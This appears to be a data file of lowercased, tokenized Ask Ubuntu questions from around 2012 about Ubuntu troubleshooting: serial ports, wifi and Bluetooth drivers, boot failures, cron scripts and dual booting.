185805	arduino ide not connecting to microcontroller	i get this error when trying to connect to an arduino through a usb serial connection . i 'm using the arduino ide 1.0.1 and the 64bit version of ubuntu 12.04 . this has been a reoccurring problem since 10.04 and happens to a few other programs that use a serial connection too . i have no problem getting serial data from the arduino using python or screen . the arduino ide seems to work just fine otherwise . processing.app.serialexception : error opening serial port '/dev/ttyacm0 ' . at processing.app.serial. < init > ( serial.java:178 ) at processing.app.serial. < init > ( serial.java:92 ) at processing.app.serialmonitor.openserialport ( serialmonitor.java:207 ) at processing.app.editor.handleserial ( editor.java:2447 ) at processing.app.editortoolbar.mousepressed ( editortoolbar.java:353 ) at java.awt.component.processmouseevent ( component.java:6386 ) at javax.swing.jcomponent.processmouseevent ( jcomponent.java:3268 ) at java.awt.component.processevent ( component.java:6154 ) at java.awt.container.processevent ( container.java:2045 ) at java.awt.component.dispatcheventimpl ( component.java:4750 ) at java.awt.container.dispatcheventimpl ( container.java:2103 ) at java.awt.component.dispatchevent ( component.java:4576 ) at java.awt.lightweightdispatcher.retargetmouseevent ( container.java:4633 ) at java.awt.lightweightdispatcher.processmouseevent ( container.java:4294 ) at java.awt.lightweightdispatcher.dispatchevent ( container.java:4227 ) at java.awt.container.dispatcheventimpl ( container.java:2089 ) at java.awt.window.dispatcheventimpl ( window.java:2518 ) at java.awt.component.dispatchevent ( component.java:4576 ) at java.awt.eventqueue.dispatcheventimpl ( eventqueue.java:672 ) at java.awt.eventqueue.access $ 400 ( eventqueue.java:96 ) at java.awt.eventqueue $ 2.run ( eventqueue.java:631 ) at java.awt.eventqueue $ 2.run ( eventqueue.java:629 ) at java.security.accesscontroller.doprivileged ( native method ) at java.security.accesscontrolcontext $ 1.dointersectionprivilege ( accesscontrolcontext.java:105 ) at java.security.accesscontrolcontext $ 1.dointersectionprivilege ( accesscontrolcontext.java:116 ) at java.awt.eventqueue $ 3.run ( eventqueue.java:645 ) at java.awt.eventqueue $ 3.run ( eventqueue.java:643 ) at java.security.accesscontroller.doprivileged ( native method ) at java.security.accesscontrolcontext $ 1.dointersectionprivilege ( accesscontrolcontext.java:105 ) at java.awt.eventqueue.dispatchevent ( eventqueue.java:642 ) at java.awt.eventdispatchthread.pumponeeventforfilters ( eventdispatchthread.java:275 ) at java.awt.eventdispatchthread.pumpeventsforfilter ( eventdispatchthread.java:200 ) at java.awt.eventdispatchthread.pumpeventsforhierarchy ( eventdispatchthread.java:190 ) at java.awt.eventdispatchthread.pumpevents ( eventdispatchthread.java:185 ) at java.awt.eventdispatchthread.pumpevents ( eventdispatchthread.java:177 ) at java.awt.eventdispatchthread.run ( eventdispatchthread.java:138 ) caused by : gnu.io.unsupportedcommoperationexception : invalid parameter at gnu.io.rxtxport.setserialportparams ( rxtxport.java:171 ) at processing.app.serial. < init > ( serial.java:163 ) ... 35 more
185810	setting up custom shortcuts in xfce	xfce does not seem to have proper doucmentation regarding setting up short cuts , i want to be able to map custom shortcuts , how do i do that ?
185813	how to do a port proxy ?	as some software does n't listen to ipv6 port , we often do a port proxy to solve the problem . for example , the remote desktop in win2003 , we just run netsh interface portproxy add v6tov4 listenport=3389 connectaddress=127.0.0.1 connectport=3389 and then everything goes well . now i 'd like to visit the deluge webui ( 127.0.0.1:8112 ) by ipv6 , how to do this in ubuntu ? ? ?
185815	how do i clear everything ( data , viruses ) from a thumbdrive ?	say i used some thumbdrive on a public windows computer and i copy some data to my ubuntu computer with it . i can not be completely sure that the windows computer was clean , and it might have put something onto my thumbdrive . is there a way to erase everything on a usb-stick , even mbr viruses and that kind of off-filesystem stuff ?
185819	choppy streaming audio	i could use some help troubleshooting choppy streaming audio . the problem is jerky playback regardless of audio or video with audio . both chromium and firefox have the problem , however files played directly on the machine with rhythmbox sound just fine . i 'm running 12.04 lts on a c2d t9300 . most of the audio problems others ask about seem to be hardware related , so the following information might be relevant . sudo lshw -c multimedia *-multimedia description : audio device product : 82801h ( ich8 family ) hd audio controller vendor : intel corporation physical id : 1b bus info : pci @ 0000:00:1b.0 version : 03 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=snd_hda_intel latency=0 resources : irq:48 memory : f8400000-f8403fff
185820	how can i mount a fat filesystem automatically as ubuntu starts ?	i have a dual boot system with an ubuntu-filesystem a windows filesystem and another fat filesystem on my harddrive . my thunderbird configuration is on that fat partition . i tried different tools , but they are mounting the filesystem as root , so thunderbird can not read and write on it . sorry for my bad english and thanks for your answers .
185826	does ubuntu support core parking ?	core parking is a new feature that introduced in windows 7 to get better battery performance . depending on the resource use of the operating system it may park one or multiple cores of a multi-core cpu to reduce the computerâs power consumption and thermal emissions . once operations require more processing power , the parked cores are activated again to assist in the tasks so my question is that is there any way i can do it on ubuntu 12.04 `` core parking `` ?
185833	how to decrease sensitivity of the launcher ?	i constantly have the problem of the launcher opening when i want to do something in an application ; i also want launcher to appear as quickly as possible to e.g . switch or boot up new applications . how can this be solved ? do i re-size windows so that the left edge is always to right of the launcher ? thanks !
185836	bluetooth not working ubuntu 12.04 fujitsu p771 foxconn /hon-hai 0489 : e031	ubuntu 12.04 does not recognize bt foxconn /hon-hai 0489 : e031 on my fujitsu lifebook p771 . i went through several threads , but could not solve the problem . any possible solution ? thanks , maurizio
185842	why does ubuntu , sometimes , fails to load ?	i recently installed ubuntu 12.04 lts on my sony vaio vpceh ( with windows 7 home basic previously installed ) . sometimes when i boot in ubuntu , following things happen : ubuntu loading screen seems to freeze . esc key does n't show installation progress . hard-drive led does n't glow . caps lock and scroll lock keys keep blinking . i 've to manually restart my laptop . on restart , ubuntu loads normally . what can i do to recover from present situation ?
185844	ubuntu 12.04 mozilla quicktime stream not working	i tried to watch some trailers from apple.com but suddenly it is asking for quicktime instead of showing the movie . it used to work until last week , not sure if some update messed someting up . any way how i can test it and fix this problem . restricted extras are installed . firefox latest version . vlc plugin installed .
185845	how do i get this script to run periodically via cron ?	i made a script that sends my local sensors temperature to a server in the internet and then i can see a graph of it . everything works fine when i execute it manully . i have the latest ubuntu version . when it comes to run periodically every minute with crontab then nothing works . it doesnt send anything . i tried to run it as sudo and as user , i tried to add it in the crontab file to run it from several locations like /bin/myscript.sh , /user/desktop and many others ... nothing seems to work . any idea how to solve it ? thank you ! echo init ... temp=`/usr/bin/snmpwalk -v 1 -c public 192.168.1.2 iso.3.6.1.4.1.38783.3.9.0 | cut -d '' `` -f4` echo $ temp realtemp=`echo `` scale=1 ; $ temp/10 '' | bc -l` echo $ realtemp echo wget `` http : //api.thingspeak.com/update ? key=mykey= $ realtemp ''
185846	custom trackpad mapping does n't work for all applications	i found out i could invert my trackpad scrolling , so as to work more like the os x `` natural scrolling '' , which i liked better . to do that , i run the following command on startup : xinput set-button-map 11 1 2 3 5 4 7 6 where 11 is the touchpad id ( found with xinput list and xinput test 11 ) . this inverts the vertical and horizontal two-finger scrolling , and works fine in terminal , chrome , document viewer , etc . however , it does n't work in nautilus and some applications such as the update manager , as they keep the usual mapping . i 'm running ubuntu 12.04 x64 why does this mapping work for some applications but not for others ? i know there is software i can download to do the same , but this method seemed `` cleaner '' . thanks
185847	how can i use a canoscan n640pex scanner over a usb/parallel cable ?	i have an old canoscan n640pex flat bed scanner and a usb-to-parallel port cable through which i can connect it to my pc . unfortunately neither simple scan nor xsane detect the scanner . i 'm running ubuntu 12.04 ( plus updates and backports ) with kernel 3.2.0-31-generic . dmesg tells me this when i plus the cable in : [ 256411.641910 ] usb 7-1 : new full-speed usb device number 10 using uhci_hcd [ 256411.872392 ] usblp0 : usb bidirectional printer dev 10 if 0 alt 1 proto 2 vid 0x067b pid 0x2305 [ 256411.872417 ] usbcore : registered new interface driver usblp lsusb shows this device for my cable : bus 007 device 010 : id 067b:2305 prolific technology , inc. pl2305 parallel port the device node created is /dev/usb/lp0 crw-rw -- -- 1 root lp 180 , 0 sep 9 17:46 /dev/usb/lp0 there is no extra information from any of these commands when i attach the scanner to the cable and power it on , though . i suspect i might need to change something in /etc/sane.d/canon_pp.conf , but i have no idea what to put for the ieee1284 line , since there is pretty much zero documentation for that parameter . so how can i get it to work ?
185848	i ca n't get ubuntu installation to start	i have a computer with the following configuration : azus sabertooth motherboard intel i5 2500 cpu windows 7 installed i 'm trying to install linux . i first attempted to install pin guy . i burned the iso , booted from it , got the initial menu ; attempting to either run the live version from dvd , or install to system . however the process stops at a blank screen with the blinking cursor in left corner . so i downloaded ubuntu and got the same results . then i tried wubi and ended up in the same position . edit : uefi might be part of the problem ? based on the link below i have determined that the process will be too time consuming and or risky so i 'm giving up . https : //help.ubuntu.com/community/uefibooting
185852	can connect to wifi but can not go on the internet ( ubuntu 12.04 )	i recently got myself a new hp pavilion dm4-2102eo with a built-in intel centrino wireless-n 1030 wifi adapter . after messing a bit around with the partitions on the hard drive , i finally got to install the latest version of ubuntu ( 12.04 ) , now running a dualboot setup with the pre-installed windows 7 ( using grub ) . so far everything has been running smoothly . ubuntu quickly found drivers for almost all of my computer 's hardware . that included drivers for the wireless-n 1030 card -- or so i thought ! after having installed ubuntu , i connected to my home wlan ( which was visible along with a range of other wireless networks in my neighborhood ) . i entered my wpa password and connected successfully . i opened up firefox , typed in gmail.com , hit enter and ... nothing happened ! it kept on loading until it finally gave up and said that the connection could not be established . i am now back on my windows partition where the internet works flawlessly . so does it on my iphone , my mother 's ipad and my brother 's mbp . since a lot of different devices are able to log onto our wireless network , the problem must lie within the ubuntu installation . i have taken screenshots of the connection settings ( see here ) and of the output of running the command ifconfig in terminal ( see here ) . i am confident with terminal and know how to do some basic operations but i have no clue of where to start here . i have been searching for solutions online but it seems that most people have different setups and need different solutions . i hope that you guys will be able to help me out . thank you so much ! best regards , sebastian
185854	can not find network connection in kde	i used network connection to connect to internet ( dongle ) which automatically detect my device in gnome but when i log off to kde i can not find networking connection and i can not connect to internet , i found only network tool which i ca n't figure it to connect .
185860	how to install ubuntu on windows ?	i downloaded ubuntu from torrent , and opened it by extracting the file . now , i do n't know what to do , and copied all the files in c : drive and restarted my pc , but ubuntu does n't get started . what more i 've to do ?
185862	gui not showing after installation of 8.04 on virtual machine	i just installed ubuntu 8.04 on vmware workstation , but it 's stuck after installation . here 's the image of phase that i am stuck in could someone instruct me on what to do next ? i am confused .
185863	using terminal in hacking way ( xubuntu 10.04 )	i would like to ask some questions about the linux terminal . my first question is : - what is the name of th terminal in xubuntu 10.04 ( for example- bash or anything like this ) ? my second question is : - is there any way of using the terminal for hacking ( e.g . port scanning , whois , gaining root account and take a look of the file system of the server or another things ) .
185869	on a win 7 machine , can i have both 32 and 64 bit ubuntu boots ?	i have a machine that is win 7 enterprise . i installed an ubuntu 64-bit on a dual boot . however , it turns out that i have software requiring 32-but ubuntu . can i install another instance of ubuntu as 32-bit and three boots ? also , how can i change my ubuntu to be the primary boot rather than windows ?
185874	how to enable bluetooth and change brightness in sony vaio vpceh26en ?	there are two basic questions . i have vpceh26en sony vaio laptop . i 'm using ubuntu 12.04 32 bit as my sole os . neither bluetooth is working ( says its disabled ) nor the brightness can be changed using the slider . p.s : my system is 64 bit .
185875	should switching users switch tty as well ?	in trying to troubleshoot user switching hangs and irregularity 's i noticed if i log in as user a then switch to user b , and then press , ( tty7 ) will take me directly back to the unlock prompt for user a . ( tty8 ) will bring me to user b 's x session . adding user c to the mix adds ( tty9 ) . is this how user switching is suppose to work or is something not configured properly on my system ? are n't there only supposed to be 7 tty sessions configured ? i think this is the cause of my user switching issues .
185879	ubuntu server 12.04 start fails after update	i did an system update on ubuntu server 12.04 , which requested a reboot . since that , the system never reaches the login . it hangs on : mount : mounting /dev on /root/dev failed : no such file or directory done . mount : mounting /sys on /root/sys failed : no such file or directory mount : mounting /proc on /root/proc failed : no such file or directory target filesystem does n't have requested /sbin/init . no init found . try passing init= bootarg . busybox v1.18.5 ( ubuntu 1:1.18.5-1ubuntu4 ) build-in shell ( ash ) enter 'help ' for a list of build-in commands . ( initramfs ) i tried already to repair it using a live system : mounting the filesystems ( /boot ext , / btrfs ) fsck ran without problems . /etc/fstab seems to be ok. apt update/upgrade on chroot succeed . now , i have no more ideas .
185888	ubuntu crashes at login screen	i 'm completely new to linux and wanted to give it a try . i installed ubuntu using the windows installer . after rebooting the pc it automatically boots into ubuntu and get the first time run screen and then the login screen . at first the cursor wo n't move , or just sometimes . after a minute or so it moves like it should but nothing else works . i ca n't click anything and the clock remains on the same time . when i hard reset the pc and select ubuntu i get a message : try ( hd0,0 ) : ntfs5 : no wubildr try ( hd0,1 ) : ntfs5 : error `` prefix '' is not set this is only for a split second . after this i get a screen filled with artifacts , some rumbling sounds from my speakers and then the login screen appears giving me the same problems .
185892	is there any program available for making bootable usb drive ?	i just do n't understand the how-to pages for installing ubuntu from usb drive . is there any program that can make usb drive from previously downloaded ubuntu iso images ? something like that would be pretty handy .
185895	how to burn ubuntu to a cd and make it bootable	i need help with burning ubuntu to a cd and being able to boot it into a pc , and an old ibook . i have already downloaded the iso file , and have burned it to a cd . however when i try to load it , it does n't work . i would also need help when it boots up . i would like to perform the procedure on a pc too .
185900	ca n't install ubuntu12.04.1 lts ; is the graphics card responsible for that ?	specs : intel core i7 win7 32-bit nvidia geforce gtx 560 23 inch monitor i have an ubuntu dvd . it boots fine , but when i select any of the options ( like `` install ubuntu '' ) i get a blinking cursor which blinks forever . the dvd also works fine on other pcs , even having lesser specs like pentium d. dvd name : ubuntu-12.04.1-dvd-amd64.iso is it the problem of my nvidia graphics card ?
185907	how can i replace rhythmbox with banshee ?	i have just upgraded to 12.04 and i 'm not happy that the integrated music player is once again rhythmbox . i much prefer banshee and would prefer to have it as the default music player in the same style as it was before ( i.e . default audio application , completely integrated into sound menu , ubuntu one integration ) . also , i would like to be rid of rhythmbox as the default .
185911	what is kde ? how to implement application for cloud	i have some questions i searched for it but could n't found any answer to them . what is kde ? i heard that captures frames of what application that runs under it ? if it does , could someone explain me more about it ? i want to make how to make application for cloud server ? which version of ubuntu needs to be installed ? is kde able to run on cloud server ?
185914	postfix dns problem	so i get interesting problem with postfix which is it can not sent emails with its own smtp service ! i need to use third party smtp server which is bad option . that error log is at friendpaste : mail log ( if it ask pass look litle down ) ( it require pass which is saatana537 ) so what is the problem ?
185916	ubuntu server 12.04 + wifi - wpa supplicant issues	i 've been trying ( and failing ) all weekend to get my homeserver connected via wifi ( i know it should be cabled , but a house move is imminent ; - ) . the setup is as follows : hp n40l microserver ubuntu server 12.04 lts 64bit edimax ew-7612uan v2 - usb wifi adaptor tenda n150 wifi router - run 1 ssid as b/g/n mixed mode , channel 6 , wpa2 personal , aes on a fresh install of ubuntu , my output is as follows : ifconfig ifconfig wlan0 up root @ srv : /home/srvadmin # ifconfig eth0 link encap : ethernet hwaddr 00:9c:02 : a9:27 : b9 inet addr:192.168.0.106 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :29c:2ff : fea9:27b9/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:1226 errors:0 dropped:0 overruns:0 frame:0 tx packets:534 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:124170 ( 124.1 kb ) tx bytes:78708 ( 78.7 kb ) interrupt:18 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:4 errors:0 dropped:0 overruns:0 frame:0 tx packets:4 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:240 ( 240.0 b ) tx bytes:240 ( 240.0 b ) wlan0 link encap : ethernet hwaddr 80:1f:02:4b:0e:9a up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) lshw -c network root @ srv : /home/srvadmin # lshw -c network *-network description : ethernet interface product : netxtreme bcm5723 gigabit ethernet pcie vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:02:00.0 logical name : eth0 version : 10 serial : 00:9c:02 : a9:27 : b9 size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm vpd msi pciexpress bus_master cap_list ethernet physical tp 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=tg3 driverversion=3.121 duplex=full firmware=5723-v3.35 ip=192.168.0.106 latency=0 link=yes multicast=yes port=twisted pair speed=100mbit/s resources : irq:42 memory : fe9f0000-fe9fffff *-network description : wireless interface physical id : 1 bus info : usb @ 1:5 logical name : wlan0 serial : 80:1f:02:4b:0e:9a capabilities : ethernet physical wireless configuration : broadcast=yes driver=rtl8192cu driverversion=3.2.0-29-generic firmware=n/a link=no multicast=yes wireless=ieee 802.11bgn iwconfig root @ srv : /home/srvadmin # iwconfig wlan0 wlan0 ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=20 dbm retry long limit:7 rts thr=2347 b fragment thr : off encryption key : off power management : off steps : 1. wpa_passphrase myssid mykey > /etc/wpa_supplicant.conf 2. wpa_supplicant -iwlan0 -dwext -c/etc/wpa_supplicant.conf the output is as follows : root @ srv : /home/srvadmin # wpa_supplicant -iwlan0 -dwext -c/etc/wpa_supplicant.conf ioctl [ siocsiwencodeext ] : invalid argument ioctl [ siocsiwencodeext ] : invalid argument trying to associate with c8:3a:35:2c:63:28 ( ssid='myssid ' freq=2437 mhz ) associated with c8:3a:35:2c:63:28 authentication with c8:3a:35:2c:63:28 timed out . ctrl-event-disconnected bssid=00:00:00:00:00:00 reason=0 ioctl [ siocsiwencodeext ] : invalid argument ioctl [ siocsiwencodeext ] : invalid argument trying to associate with c8:3a:35:2c:63:28 ( ssid='myssid ' freq=2437 mhz ) authentication with c8:3a:35:2c:63:28 timed out . if i try to force a dhcp request with wpa_supplicant -b -iwlan0 -c/etc/wpa_supplicant.conf -dwext & & dhclient wlan0 , it just seems to hang and i can see dhcpdiscover requests in syslog . i must be doing something silly to get stuck , when other posts make it look so simple ( e.g . how do i connect to a wpa wifi network using the command line ? ) . does anyone have any ideas on how to resolve this ?
185918	wireless broadcom 4313 not working on ubuntu 12.04	it seems a lot of people are having this problem , but none of the posted solutions have worked for me so far . my driver is installed and activated , i have tried removing and re-adding the network , and various other fixes . no networks were picked up on my first boot , the next day wireless worked fine , and since then it does not detect networks , and when i manually try to connect , it repeatedly asks for the password and does not connect . here 's my info : 03:00.0 network controller : broadcom corporation bcm4313 802.11b/g/n wireless lan controller ( rev 01 ) subsystem : dell inspiron m5010 / xps 8300 flags : bus master , fast devsel , latency 0 , irq 17 memory at f0500000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : [ 40 ] power management version 3 capabilities : [ 58 ] vendor specific information : len=78 capabilities : [ 48 ] msi : enable- count=1/1 maskable- 64bit+ capabilities : [ d0 ] express endpoint , msi 00 capabilities : [ 100 ] advanced error reporting capabilities : [ 13c ] virtual channel capabilities : [ 160 ] device serial number 00-00-a1-ff-ff-f3-70-f1 capabilities : [ 16c ] power budgeting kernel driver in use : wl kernel modules : wl , bcma , brcmsmac root @ michelle-laptop : /home/michelle # ifconfig eth0 link encap : ethernet hwaddr 70 : f1 : a1 : f3 : ba : ab inet6 addr : fe80 : :72f1 : a1ff : fef3 : baab/64 scope : link up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:29 tx packets:0 errors:30 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:17 eth1 link encap : ethernet hwaddr f0:4d : a2:53:83:7a up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:43 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:104 errors:0 dropped:0 overruns:0 frame:0 tx packets:104 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:8000 ( 8.0 kb ) tx bytes:8000 ( 8.0 kb ) root @ michelle-laptop : /home/michelle # lsmod module size used by dm_crypt 22528 0 snd_hda_codec_hdmi 31775 1 snd_hda_codec_realtek 174313 1 snd_hda_intel 32765 5 snd_hda_codec 109562 3 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel snd_hwdep 13276 1 snd_hda_codec snd_pcm 80845 4 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec snd_seq_midi 13132 0 snd_rawmidi 25424 1 snd_seq_midi snd_seq_midi_event 14475 1 snd_seq_midi snd_seq 51567 2 snd_seq_midi , snd_seq_midi_event parport_pc 32114 0 ppdev 12849 0 binfmt_misc 17292 1 lib80211_crypt_tkip 17275 0 bnep 17830 2 rfcomm 38139 0 snd_timer 28931 2 snd_pcm , snd_seq snd_seq_device 14172 3 snd_seq_midi , snd_rawmidi , snd_seq joydev 17393 0 wl 2646601 0 snd 62064 19 snd_hda_codec_hdmi , snd_hda_codec_realtek , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , snd_rawmidi , snd_seq , snd_timer , snd_seq_device soundcore 14635 1 snd btusb 17912 0 bluetooth 158438 11 bnep , rfcomm , btusb uvcvideo 67203 0 videodev 86588 1 uvcvideo snd_page_alloc 14108 2 snd_hda_intel , snd_pcm lib80211 14040 2 lib80211_crypt_tkip , wl intel_ips 17822 0 psmouse 72919 0 serio_raw 13027 0 mei 36570 0 dell_laptop 17767 0 dell_wmi 12601 0 dcdbas 14098 1 dell_laptop sparse_keymap 13658 1 dell_wmi mac_hid 13077 0 lp 17455 0 parport 40930 3 parport_pc , ppdev , lp usbhid 41906 0 hid 77367 1 usbhid wmi 18744 1 dell_wmi i915 414817 3 atl1c 36718 0 drm_kms_helper 45466 1 i915 drm 197692 4 i915 , drm_kms_helper i2c_algo_bit 13199 1 i915 video 19068 1 i915 root @ michelle-laptop : /home/michelle # iwlist scan lo interface does n't support scanning . eth1 interface does n't support scanning . eth0 no scan results root @ michelle-laptop : /home/michelle # rfkill list 0 : dell-wifi : wireless lan soft blocked : no hard blocked : no 1 : dell-bluetooth : bluetooth soft blocked : yes hard blocked : no 3 : brcmwl-0 : wireless lan soft blocked : no hard blocked : no obviously i do n't know what i 'm doing . i 'd appreciate any help ! thanks ! further inforation as requested : update : at the moment i am connected to wireless but the driver is not activated . wireless is still not working reliably . here 's the info you requested : 03:00.0 0280 : 14e4:4727 ( rev 01 ) subsystem : 1028:0010 control : i/o- mem+ busmaster+ speccycle- memwinv- vgasnoop- parerr- stepping- serr+ fastb2b- disintx- status : cap+ 66mhz- udf- fastb2b- parerr- devsel=fast > tabort- serr- latency : 0 , cache line size : 64 bytes interrupt : pin a routed to irq 17 region 0 : memory at f0500000 ( 64-bit , non-prefetchable ) [ size=16k ] capabilities : [ 40 ] power management version 3 flags : pmeclk- dsi- d1+ d2+ auxcurrent=0ma pme ( d0+ , d1- , d2- , d3hot+ , d3cold+ ) status : d0 nosoftrst+ pme-enable- dsel=0 dscale=2 pme- capabilities : [ 58 ] vendor specific information : len=78 capabilities : [ 48 ] msi : enable- count=1/1 maskable- 64bit+ address : 0000000000000000 data : 0000 capabilities : [ d0 ] express ( v1 ) endpoint , msi 00 devcap : maxpayload 128 bytes , phantfunc 0 , latency l0s < 4us , l1 unlimited exttag+ attnbtn- attnind- pwrind- rbe+ flreset- devctl : report errors : correctable- non-fatal- fatal- unsupported- rlxdord- exttag- phantfunc- auxpwr- nosnoop- maxpayload 128 bytes , maxreadreq 128 bytes devsta : correrr+ uncorrerr- fatalerr- unsuppreq+ auxpwr+ transpend- lnkcap : port # 0 , speed 2.5gt/s , width x1 , aspm l0s l1 , latency l0 < 4us , l1 < 64us clockpm+ surprise- llactrep+ bwnot- lnkctl : aspm l0s l1 enabled ; rcb 64 bytes disabled- retrain- commclk+ extsynch- clockpm+ autwiddis- bwint- autbwint- lnksta : speed 2.5gt/s , width x1 , trerr- train- slotclk+ dlactive+ bwmgmt- abwmgmt- capabilities : [ 100 v1 ] advanced error reporting uesta : dlp- sdes- tlp- fcp- cmpltto+ cmpltabrt- unxcmplt- rxof- malftlp- ecrc- unsupreq- acsviol- uemsk : dlp- sdes- tlp- fcp- cmpltto- cmpltabrt- unxcmplt- rxof- malftlp- ecrc- unsupreq- acsviol- uesvrt : dlp+ sdes- tlp- fcp+ cmpltto- cmpltabrt- unxcmplt- rxof+ malftlp+ ecrc- unsupreq- acsviol- cesta : rxerr+ badtlp+ baddllp+ rollover- timeout+ nonfatalerr+ cemsk : rxerr- badtlp- baddllp- rollover- timeout- nonfatalerr+ aercap : first error pointer : 14 , gencap+ cgenen- chkcap+ chken- capabilities : [ 13c v1 ] virtual channel caps : lpevc=0 refclk=100ns patentrybits=1 arb : fixed- wrr32- wrr64- wrr128- ctrl : arbselect=fixed status : inprogress- vc0 : caps : patoffset=00 maxtimeslots=1 rejsnooptrans- arb : fixed- wrr32- wrr64- wrr128- twrr128- wrr256- ctrl : enable+ id=0 arbselect=fixed tc/vc=ff status : negopending- inprogress- capabilities : [ 160 v1 ] device serial number 00-00-a1-ff-ff-f3-70-f1 capabilities : [ 16c v1 ] power budgeting kernel driver in use : wl kernel modules : wl , bcma , brcmsmac extra info , including syslog from when wireless was not working : http : //pastebin.ubuntu.com/1203671/ based on advice from another thread , i blacklisted mac80211 , cfg80211 , wl , lib80211_crypt_tkip , and lib80211 . i then added `` modprobe brcm80211 '' to rc.local . now when i boot up , nothing happens until i look at additional drivers . the sta driver is not enabled , and when i hit `` activate , '' it comes up with an error message , but then immediately conects to the internet without activating the driver . so i guess i just need to figure out how to make it do that automatically without having to go through trying to activate the driver . here 's what syslog looks like now : http : //pastebin.ubuntu.com/1203702/
185920	bootable 12.04 usb drive failing due to `` filesystem can not be mounted ... '' error ?	i 've been trying to install ubuntu 12.04 from a bootable usb drive to my ocz 256gb ssd , and have had nothing but problems . at first it was hanging at a black screen but then , following some directions i found on another askubuntu.com questions , i set console=tty1 as a boot option and saw at what point the installation process was freezing : i have this issue using the 32- or 64-bit image . i have downloaded the isos multiple times in case i had a corrupted image . i have tried creating bootable usb drive on another ubuntu machine using both usb-creator and unetbootin ; i have also tried creating it on windows using linuxlive usb creator ( same thing as usb-creator on linux ) and unetbootin as well . my pc is a uefi system , if it 's relevant . i am very confused since i have installed ubuntu 11+ from usb many , many times and have never had an issue . how do i resolve this issue ? my only recourse right now is to run ubuntu inside a virtualbox .
185921	ubuntu 12.04 and kde , graphical temperature monitor for gpu	i have ubuntu 12.04 and kde . i already installed `` lm-sensors '' , `` hardware sensors indicator '' and `` psensors '' but none works well for me . i also know a couple of commands to find gpu temperature on terminal but i do n't need that , i need a graphical application that works with kde to use . do you know something that helps me ? my card is msi r6870 hawk ( from ati original hd6870 ) and i have fglrx drivers thanks
185922	simultaneous commands	i 'm trying to get bash to execute two commands simultaneously . i 've read a little about job control , & , bg , fg , but the problem is that the command i want to run does n't run properly in the bg . specifically , i 'm trying to get two movie files to start running simultaneously in mplayer ( to compare the two ) . $ mplayer [ file1 ] & mplayer [ file2 ] & does n't work .
185925	kworker consuming % 100 cpu	i have a process , named kworker which is continuously consuming 100 % of the cpu 's computing capacity . i have tried several possible solutions over a period of 3 months , but to no avail . i even got to upgrade to u + 1 ( ubuntu 12.10 quantal quetzal ) , but my effort was , again , fruitless . i desperately need some help , because , as is , this process is draining my computer 's battery so fast , that makes linux usage a disappointing experience . it is noteworthy , that i do not have any such issues when i use windows , which results in twice as much battery life .
185929	dual-boot : ca n't select windows at boot	i have a computer with 2 operating systems dual booted : one is windows 7 and the other is ubuntu . my ubuntu installation is installed within the windows partition via wubi.exe . i 'm not using grubby , but windows 7 's default bootloader . from within the windows settings i have set the time to choose the operating system to boot to zero , and as ubuntu is at the top of the list , it boots automatically , not giving an option to load my windows 7 installation . my problem is that i can not access my windows 7 operating system . it is essential to my work , so i am unable to remove this partition . could someone give me a clue as to what to do ?
185931	steam , team fortress 2 black screen ?	i installed steam with winetricks and used steam to install tf2 , but when i tried to boot , all i see is the logos and then a black screen . what did i do wrong ?
185932	ubuntu on macbook pro fails to boot : timer does n't work through interrupt-remapped io-apic	after i was installed ubuntu on my macbook pro using wubi in windows 7 professional 32-bit and restarted my pc to boot from ubuntu , i got that message : kernel panic not syncing : timer does n't work through interrupt-remapped io-apic what can i do to start trying this system and fix this problem ?
185943	deleted some files from home folder	i have recently installed ubuntu for the first time in my life . so i am fairly new to it . i have deleted some files from my home folder . but now the problems have started . the system volume automatically reduces to zero . further , as soon as i restarted my system , my panel settings we restored to default . when i right click in my home folder , it gives an option of 'restore missing files ' but i am not able to restore them . please guide me how to restore them . thanks narendra
185952	where can i find information about ubuntu compatible or certified hardware/pc models ?	i am buying a new desktop pc in early 2013 , anyway this question should apply to someone intending to buy a new laptop/ultrabook as well . this machine is not meant for gaming , and if i ocasionally do it , i can survive with minimum graphics . however i may need some heavy multimedia edition or multitasking at times , so basically my greatest priority is a good processor , after that perhaps average graphic card ( if onboards are not enough , i am still not informed enough about that ) , at least 4gb of ram with possibility of expansion . i know there are some pc models specially designed to ship with ubuntu , which is the os i use the most these days . however , most people around me use windows and some software with unsupported versions for linux and not having a windows license becomes a bit problematic . given that , i would like to find information about which pc models or even manufacters currently on the market have the best compatibility with ubuntu , i am still undecided between building my own desktop or buying a pre-made model , so i would like to find information both for certified models and certified hardware or even ubuntu partners that may work closely with canonical . where to find this information in order to make sure that i will have a good experience with ubuntu on my new pc in the years to come ?
